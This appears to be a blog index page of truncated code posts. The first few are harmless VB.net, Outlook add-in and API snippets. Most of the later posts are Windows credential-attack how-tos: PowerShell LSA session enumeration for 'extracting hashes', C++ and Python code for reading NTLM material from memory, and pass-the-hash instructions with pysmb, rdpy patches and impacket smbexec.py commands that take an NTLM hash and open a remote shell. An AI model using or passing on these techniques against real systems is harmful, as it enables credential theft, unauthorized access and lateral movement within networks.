Detect and know when your workstation is locked with VB.net

Imports System.Timers Public Class WorkStationReader #Region “API Calls” Private Const DESKTOP_CREATEMENU As Int32 = &H4& Private Const DESKTOP_CREATEWINDOW As Int32 = &H2& Private Const DESKTOP_ENUMERATE As Int32 = &H40& Private Const DESKTOP_HOOKCONTROL As Int32 = &H8& Private Const DESKTOP_READOBJECTS As Int32 = &H1& Private Const DESKTOP_SWITCHDESKTOP As Int32 = &H100& Private Const DESKTOP_WRITEOBJECTS As Int32 = &H80& Private Const GENERIC_WRITE As Int32 = &H40000000 Private Const HWND_BROADCAST As Int32 = &HFFFF& Private Const WM_HOTKEY As Int32 = &H312 Private Const MOD_ALT As Int32 = &H1 Private Const MOD_CONTROL As Int32 = &H2 Private Const VK_DELETE As Int32 = &H2E Private …

Outlook Plugin to Track Jabber and Jira.

using System; using System.Collections.Generic; using System.Linq; using System.Text; using System.Xml.Linq; using Outlook = Microsoft.Office.Interop.Outlook; using Office = Microsoft.Office.Core; using System.Windows.Forms; using System.Runtime.InteropServices; using System.DirectoryServices.AccountManagement; using System.DirectoryServices; using System.Collections; using System.Xml; using System.Xml.XPath; using System.Net; using System.Diagnostics; using System.Text.RegularExpressions; namespace EmailManager { public partial class ThisAddIn { Timer MyTimer = new Timer(); private void ClearCalendarAudits() { try { Outlook.Folder calFolder = Application.Session.GetDefaultFolder(Outlook.OlDefaultFolders.olFolderCalendar) as Outlook.Folder; DateTime start = DateTime.Now.AddDays(-7); DateTime end = DateTime.Now; Outlook.Items rangeAppts = GetAppointmentsInRange(calFolder, start, end); if (rangeAppts != null) { foreach (Outlook.AppointmentItem appt in rangeAppts) { //Debug.WriteLine(DateTime.Now.ToString() + ” – ” +”Subject: ” + appt.Subject + ” Start: …

Extracting Street Data from GoogleMaps Street image

Public Class Form1 Dim Cycles As Integer = 0 Dim DictionaryListUsed As New Dictionary(Of Color, Integer) Dim DictionaryList As New Dictionary(Of Color, Integer) Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load Dim img As Bitmap = New Bitmap(“C:\Users\User\Desktop\GoogleMap.png”) Dim x, y As Integer Using G As Graphics = Me.CreateGraphics Dim BMP As New Bitmap(img.Width, img.Height) Dim BMP2 As New Bitmap(img.Width, img.Height) Dim pixel As Color = Nothing For x = 0 To img.Width – 1 For y = 0 To img.Height – 1 pixel = img.GetPixel(x, y) If (DictionaryList.ContainsKey(pixel)) Then DictionaryList(pixel) += 1 Else DictionaryList.Add(pixel, 1) End If …

Skyhook API with VB.net

Imports System.IO Imports System.Net Imports System.Text Public Class Form1 Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load SendHTTPSPost() End Sub Sub SendHTTPSPost() ‘ Create a request using a URL that can receive a post. Dim request As WebRequest = WebRequest.Create(“https://api.skyhookwireless.com/wps2/location”) ‘Dim request As WebRequest = WebRequest.Create(“https://global.skyhookwireless.com/wps2/location”) ‘ Set the Method property of the request to POST. request.Method = “POST” ‘ Create POST data and convert it to a byte array. Dim XML As String XML = “<LocationRQ xmlns=’https://skyhookwireless.com/wps/2005′ version=’2.6′ street-address-lookup=’full’>” XML &= “<authentication version=’2.0′>” If True Then XML &= “<key key=’PUTYOUR-KEYHERE’ username=’name’/>” Else XML &= “<simple>” XML &= …

Powershell and Extracting hashes

Remove-Variable * -ErrorAction SilentlyContinue; Remove-Module *; $error.Clear(); $MethodDefinition = @’ [DllImport(“Secur32.dll”, CharSet = CharSet.Unicode)] public static extern uint LsaEnumerateLogonSessions(out UInt64 LogonSessionCount, out IntPtr LogonSessionList); [DllImport(“Secur32.dll”, CharSet = CharSet.Unicode)] public static extern uint LsaGetLogonSessionData(IntPtr luid, out IntPtr ppLogonSessionData); ‘@ $Secur32 = Add-Type -MemberDefinition $MethodDefinition -Name ‘Secur32’ -Namespace ‘Secur32’ -PassThru add-type -PassThru -TypeDefinition @” using System; using System.Collections; using System.Collections.Generic; using System.Linq; using System.Runtime.InteropServices; using System.Security.Principal; using System.Text; namespace Ansible { [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)] public struct LSA_UNICODE_STRING { public UInt16 Length; public UInt16 MaximumLength; public IntPtr buffer; } [StructLayout(LayoutKind.Sequential)] public struct LUID { public UInt32 LowPart; public Int32 HighPart; } [StructLayout(LayoutKind.Sequential)] …

Pulling NTLM In Memory with C++

Work in progress // ReadBridge.cpp : Defines the entry point for the console application. // #include “stdafx.h” #define _WINSOCK_DEPRECATED_NO_WARNINGS #define _WINSOCK_DEPCRECATED #include “ReadBridge.h” #include “winternl.h” #ifdef _DEBUG #define new DEBUG_NEW #endif class CModuleSocket { public: CModuleSocket(void); ~CModuleSocket(void); UINT32 ConnectServer(IN const char* pIpAddr, OUT SOCKET* pSocket, OUT bool* pbSuccess); //Á¬½Ó·þÎñÆ÷ UINT32 SendCommand(IN const SOCKET socket, IN char* szBuf, IN int bytes, OUT bool* pbSuccess); //·¢ËÍÏûÏ¢ UINT32 RecvCommand(IN const SOCKET socket, OUT char* szBuf, OUT int bytes, OUT bool *pbSuccess); //½ÓÊÜÏûÏ¢ void Clean(); public: UINT m_nPort; //Á¬½Ó¶Ë¿Ú }; #pragma once #include <windows.h> //Êý¾Ý´«ÊäµÄ»º³åÇø´óС #define CONTEXT_BUF_SIZE (1024 * 4) //IPµØÖ·»º³åÇø´óС #define IPADDR_SIZE 32 …

Reading memory with Python

from ctypes import * from ctypes.wintypes import * import time import os, sys import win32security import tempfile import win32api, win32con from ntsecuritycon import TokenSessionId, TokenSandBoxInert, TokenType, TokenImpersonationLevel, TokenVirtualizationEnabled, TokenVirtualizationAllowed, TokenHasRestrictions, TokenElevationType, TokenUIAccess, TokenUser, TokenOwner, TokenGroups, TokenRestrictedSids, TokenPrivileges, TokenPrimaryGroup, TokenSource, TokenDefaultDacl, TokenStatistics, TokenOrigin, TokenLinkedToken, TokenLogonSid, TokenElevation, TokenIntegrityLevel, TokenMandatoryPolicy, SE_ASSIGNPRIMARYTOKEN_NAME, SE_BACKUP_NAME, SE_CREATE_PAGEFILE_NAME, SE_CREATE_TOKEN_NAME, SE_DEBUG_NAME, SE_LOAD_DRIVER_NAME, SE_MACHINE_ACCOUNT_NAME, SE_RESTORE_NAME, SE_SHUTDOWN_NAME, SE_TAKE_OWNERSHIP_NAME, SE_TCB_NAME OpenProcess = windll.kernel32.OpenProcess ReadProcessMemory = windll.kernel32.ReadProcessMemory CloseHandle = windll.kernel32.CloseHandle def get_extra_privs(): # Try to give ourselves some extra privs (only works if we’re admin): # SeBackupPrivilege – so we can read anything # SeDebugPrivilege – so we can find out about other …

Passing the Hash with Python SMB

git clone https://github.com/miketeo/pysmb.git python setup.py install Then drop this in test.py import sys import pprint from smb.SMBConnection import SMBConnection from util import getConnectionInfo conn = SMBConnection(“UserAccount”, “!31:70:ae:1e:3e:NT:LM:Hash:Goes:Here:a9:37:fc:e3”, “Your IP Here”, “RemoteHostname”, use_ntlm_v2 = True, is_direct_tcp = True) conn.connect(“RemoteHostName”, 445) #Use IS TCP Direct on 445 and 135 for the other results = conn.listShares() for smbtest in [r.name.lower() for r in results]: print(smbtest) # pretty print loaded modules #pprint.pprint(sys.modules) #filelist = conn.listPath(‘shared_folder_name’, ‘/’) Modify this code in Python\pysmb\python3\smb -> ntlm.py def generateChallengeResponseV2(password, user, server_challenge, server_info, domain = ”, client_challenge = None): client_timestamp = b’\0′ * 8 if not client_challenge: client_challenge = …

Installing Impacet

git https://github.com/SecureAuthCorp/impacket.git pip install –upgrade pip –trusted-host pypi.org –trusted-host files.pythonhosted.org . python smbclient.py https://www.hackingarticles.in/beginners-guide-to-impacket-tool-kit-part-1/ python setup.py install Python\impacket\examples>python smbclient.py or Python\impacket\examples>smbclient.py smbexec.py Domain/Username:YourPassword@HostOfServer or \Python\impacket\examples>smbexec.py Domain/Username@ServerHostname -hashes E52CLMHASHGOESHERE168F41AFC3A96:3170221NTLMHASHGOESHERE937FCE3 Impacket v0.9.21-dev – Copyright 2019 SecureAuth Corporation [!] Launching semi-interactive shell – Careful what you execute C:\Windows\system32>set But you can really just use this “smbexec.py Domain/Username@ServerHostname -hashes :PUT YOUR NTLM HASH HERE LIKE SO” “smbexec.py Domain/Username@ServerHostname -hashes :3170221NTLMHASHGOESHERE937FCE3” https://tobtu.com/lmntlm.php <–Use may use this site to test the hash.

Python Code for Passing the Hash

Install PIP and run pip rdpy –trusted-host pypi.org –trusted-host files.pythonhosted.org pip install pyinstaller –trusted-host pypi.org –trusted-host files.pythonhosted.org pip install pywin32 –trusted-host pypi.org –trusted-host files.pythonhosted.org or git https://github.com/citronneur/rdpy.git python setup.py install for python 2.7 Then Install PyQt4 from here, note that this only works on 2.7 -> https://pypi.org/project/PyQt4/ You may also get the link from here, https://github.com/citronneur/rdpy (in the windows section) (This will not work and will error out, this is for 2.7 only) for python 3.8+ Run this instead pip install rdpy –trusted-host pypi.org –trusted-host files.pythonhosted.org Then C:\Python27\Lib\site-packages\rdpy\protocol\rdp\nla\ntlm.py Edit this file with the following below. then execute the following command …